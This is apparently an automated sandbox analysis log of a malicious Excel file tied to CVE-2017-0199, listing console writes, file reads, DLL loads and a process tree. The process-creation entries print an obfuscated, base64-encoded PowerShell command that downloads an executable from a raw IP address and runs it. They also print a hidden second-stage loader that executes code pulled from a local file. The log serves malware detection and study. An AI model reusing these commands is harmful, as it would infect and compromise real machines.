        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................k.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................l.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................l.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................%l.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................1l.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Cl.........................s....................`.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Ol.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................al.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................ml.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................l.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................l.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9........l.........................s............h.......".......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................l.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................l.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................l.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................l.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................l.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................m.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................m.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................. m.........................s....................`.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................,m.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................>m.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Jm.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........m.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........m.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9........m.........................s............h.......".......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................m.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........m.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........m.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........m.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................n.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................n.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................%n.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......8n.........................s....................`.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......Dn.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................4.......Xn.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................en.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........n.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................n.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9........n.........................s............h.......".......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................n.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................n.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................n.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................n.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................n.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................o.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................o.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......4o.........................s....................`.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......Co.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................Wo.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................fo.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................o.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................o.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9........o.........................s............h.......".......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................o.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........o.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........o.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........o.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................o.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................p.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................p.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................)p.........................s....................`.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................5p.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................Gp.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Sp.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......rp.........................s....................j.......................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........p.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9........p.........................s............h.......".......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........p.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........p.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........p.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........p.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........p.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........p.........................s............................H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................p.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................q.........................s....................`.......H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................."q.........................s............h...............................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................6q.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Bq.........................s............h...............H...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
        Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsxReversingLabs: Detection: 21%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6549.tmp" "c:\Users\user\AppData\Local\Temp\muz5o0kx\CSCE919D41A8D904501847FAAE39BA08A1.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\wlanext.exe "C:\Users\user\AppData\Roaming\wlanext.exe"
        Source: C:\Users\user\AppData\Roaming\wlanext.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exEJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\wlanext.exe "C:\Users\user\AppData\Roaming\wlanext.exe" Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6549.tmp" "c:\Users\user\AppData\Local\Temp\muz5o0kx\CSCE919D41A8D904501847FAAE39BA08A1.TMP"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\wlanext.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
